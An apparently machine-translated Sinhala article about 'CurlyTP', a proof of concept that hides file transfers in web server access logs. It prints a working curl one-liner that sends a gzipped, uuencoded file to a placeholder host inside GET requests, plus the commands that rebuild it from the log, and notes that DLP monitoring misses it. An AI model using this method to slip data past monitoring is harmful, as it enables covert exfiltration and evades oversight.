සේවාදායක ලොග් හරහා රහස් පණිවිඩ හුවමාරු කිරීම

විකිපීඩියා නිර්වචනයට අනුව, මිය ගිය පහත වැටීමක් යනු රහස් ස්ථානයක් භාවිතා කරන පුද්ගලයින් අතර තොරතුරු හෝ සමහර අයිතම හුවමාරු කර ගැනීමට සේවය කරන කුමන්ත්‍රණ මෙවලමකි. අදහස නම් මිනිසුන් කිසි විටෙකත් හමු නොවන බවයි - නමුත් ඔවුන් තවමත් මෙහෙයුම් ආරක්ෂාව පවත්වා ගැනීම සඳහා තොරතුරු හුවමාරු කර ගනී.

සැඟවුණු ස්ථානය අවධානය ආකර්ෂණය නොකළ යුතුය. එමනිසා, නොබැඳි ලෝකයේ ඔවුන් බොහෝ විට නුවණැති දේවල් භාවිතා කරයි: බිත්තියේ ලිහිල් ගඩොල්, පුස්තකාල පොතක් හෝ ගසක කුහරයක්.

අන්තර්ජාලයේ බොහෝ සංකේතාංකන සහ නිර්නාමික මෙවලම් ඇත, නමුත් මෙම මෙවලම් භාවිතා කිරීමේ කාරණය අවධානය ආකර්ෂණය කරයි. ඊට අමතරව, ඒවා ආයතනික හෝ රාජ්‍ය මට්ටමින් අවහිර කළ හැකිය. කුමක් කරන්න ද?

සංවර්ධක රයන් ෆ්ලවර්ස් සිත්ගන්නා විකල්පයක් යෝජනා කළේය - සැඟවුණු ස්ථානයක් ලෙස ඕනෑම වෙබ් සේවාදායකයක් භාවිතා කරන්න. ඔබ ඒ ගැන සිතන්නේ නම්, වෙබ් සේවාදායකයක් කරන්නේ කුමක්ද? ඉල්ලීම් ලබා ගැනීම, ගොනු නිකුත් කිරීම සහ ලඝු-සටහන් ලිවීම. එය සියලුම ඉල්ලීම් ලොග් කරයි, වැරදි ඒවා පවා!

ඕනෑම වෙබ් සේවාදායකයක් ලොගයේ ඕනෑම පණිවිඩයක් පාහේ සුරැකීමට ඔබට ඉඩ සලසයි. මේක පාවිච්චි කරන්නේ කොහොමද කියලා මල් කල්පනා කළා.

ඔහු මෙම විකල්පය ඉදිරිපත් කරයි:

  1. පෙළ ගොනුවක් (රහස් පණිවිඩයක්) ගෙන හැෂ් (md5sum) ගණනය කරන්න.
  2. අපි එය සංකේතනය කරමු (gzip+uuencode).
  3. අපි සේවාදායකයට හිතාමතාම වැරදි ඉල්ලීමක් භාවිතා කරමින් ලොගයට ලියන්නෙමු.

Local:
[root@local ~]# md5sum g.txt
a8be1b6b67615307e6af8529c2f356c4 g.txt

[root@local ~]# gzip g.txt
[root@local ~]# uuencode g.txt > g.txt.uue
[root@local ~]# IFS=$'n' ;for x in `cat g.txt.uue| sed 's/ /=+=/g'` ; do echo curl -s "http://domain.com?transfer?g.txt.uue?$x" ;done | sh

ගොනුවක් කියවීමට, ඔබ මෙම මෙහෙයුම් ප්‍රතිලෝම අනුපිළිවෙලින් සිදු කළ යුතුය: ගොනුව විකේතනය කර විසන්ධි කරන්න, හැෂ් පරීක්ෂා කරන්න (හැෂ් විවෘත නාලිකා හරහා ආරක්ෂිතව සම්ප්‍රේෂණය කළ හැක).

අවකාශය සමඟ ප්රතිස්ථාපනය වේ =+=එබැවින් ලිපිනයෙහි හිස් ඉඩක් නොමැත. කතුවරයා CurlyTP ලෙස හඳුන්වන වැඩසටහන, ඊමේල් ඇමුණුම් වැනි base64 කේතනය භාවිතා කරයි. ඉල්ලීම මූලික පදයකින් සිදු කෙරේ ?transfer?එවිට ලබන්නාට එය ලඝු-සටහන් වල පහසුවෙන් සොයා ගත හැක.

මෙම නඩුවේ ලොග් වලින් අප දකින්නේ කුමක්ද?

1.2.3.4 - - [22/Aug/2019:21:12:00 -0400] "GET /?transfer?g.gz.uue?begin-base64=+=644=+=g.gz.uue HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:01 -0400] "GET /?transfer?g.gz.uue?H4sICLxRC1sAA2dpYnNvbi50eHQA7Z1dU9s4FIbv8yt0w+wNpISEdstdgOne HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:03 -0400] "GET /?transfer?g.gz.uue?sDvdDW0vmWNZiQWy5JXkZMyv32MnAVNgQZCOnfhkhhkY61vv8+rDijgFfpNn HTTP/1.1" 200 4050 "-" "curl/7.29.0"

දැනටමත් සඳහන් කර ඇති පරිදි, රහස් පණිවිඩයක් ලබා ගැනීම සඳහා ඔබ ප්‍රතිලෝම අනුපිළිවෙලින් මෙහෙයුම් සිදු කළ යුතුය:

Remote machine

[root@server /home/domain/logs]# grep transfer access_log | grep 21:12| awk '{ print $7 }' | cut -d? -f4 | sed 's/=+=/ /g' > g.txt.gz.uue
[root@server /home/domain/logs]# uudecode g.txt.gz.uue

[root@server /home/domain/logs]# mv g.txt.gz.uue g.txt.gz
[root@server /home/domain/logs]# gunzip g.txt.gz
[root@server /home/domain/logs]# md5sum g
a8be1b6b67615307e6af8529c2f356c4 g

ක්රියාවලිය ස්වයංක්රීය කිරීමට පහසුය. Md5sum ගැලපෙන අතර, ගොනුවේ අන්තර්ගතය සියල්ල නිවැරදිව විකේතනය කර ඇති බව තහවුරු කරයි.

ක්රමය ඉතා සරලයි. “මෙම අභ්‍යාසයේ අරමුණ අහිංසක කුඩා වෙබ් ඉල්ලීම් හරහා ලිපිගොනු මාරු කළ හැකි බව ඔප්පු කිරීම පමණක් වන අතර එය සරල පෙළ ලොග සහිත ඕනෑම වෙබ් සේවාදායකයක ක්‍රියා කරයි. අත්‍යවශ්‍යයෙන්ම, සෑම වෙබ් සේවාදායකයක්ම සැඟවී සිටින ස්ථානයකි!” ෆ්ලවර්ස් ලියයි.

ඇත්ත වශයෙන්ම, ක්‍රමය ක්‍රියාත්මක වන්නේ ලබන්නාට සේවාදායක ලොග් වෙත ප්‍රවේශය තිබේ නම් පමණි. නමුත් එවැනි ප්රවේශයක් සපයනු ලබන්නේ, උදාහරණයක් ලෙස, බොහෝ සත්කාරක සමාගම් විසිනි.

එය භාවිතා කරන්නේ කෙසේද?

Ryan Flowers පවසන්නේ ඔහු තොරතුරු ආරක්ෂණ විශේෂඥයෙකු නොවන බවත් CurlyTP සඳහා විය හැකි භාවිතයන් ලැයිස්තුවක් සම්පාදනය නොකරන බවත්ය. ඔහු සඳහා, අප දිනපතා දකින හුරුපුරුදු මෙවලම් සාම්ප්‍රදායික නොවන ආකාරයෙන් භාවිතා කළ හැකි බව සංකල්පීය සාක්ෂියක් පමණි.

ඇත්ත වශයෙන්ම, මෙම ක්රමය වෙනත් සේවාදායක "සැඟවීම්" වැනි වාසි ගණනාවක් ඇත ඩිජිටල් ඩෙඩ් ඩ්‍රොප් හෝ මුහුදු කොල්ලකෑම: එයට සේවාදායක පැත්තේ විශේෂ වින්‍යාස කිරීමක් හෝ විශේෂ ප්‍රොටෝකෝලයක් අවශ්‍ය නොවේ - සහ ගමනාගමනය නිරීක්ෂණය කරන අය අතර සැකයක් ඇති නොකරයි. SORM හෝ DLP පද්ධතියක් සම්පීඩිත පෙළ ගොනු සඳහා URL පරිලෝකනය කරනු ඇතැයි සිතිය නොහැක.

සේවා ලිපිගොනු හරහා පණිවිඩ සම්ප්‍රේෂණය කිරීමේ ක්‍රමය මෙයයි. සමහර දියුණු සමාගම් ස්ථානගත කළ ආකාරය ඔබට මතක ඇති HTTP ශීර්ෂවල සංවර්ධක රැකියා හෝ HTML පිටු කේතයේ.

සේවාදායක ලොග් හරහා රහස් පණිවිඩ හුවමාරු කිරීම

සාමාන්‍ය පුද්ගලයෙකු ශීර්ෂ හෝ HTML කේතය දෙස නොබලන බැවින් මෙම පාස්කු බිත්තරය වෙබ් සංවර්ධකයින් පමණක් දකින බව අදහස විය.

සේවාදායක ලොග් හරහා රහස් පණිවිඩ හුවමාරු කිරීම

මූලාශ්රය: www.habr.com

අදහස් එක් කරන්න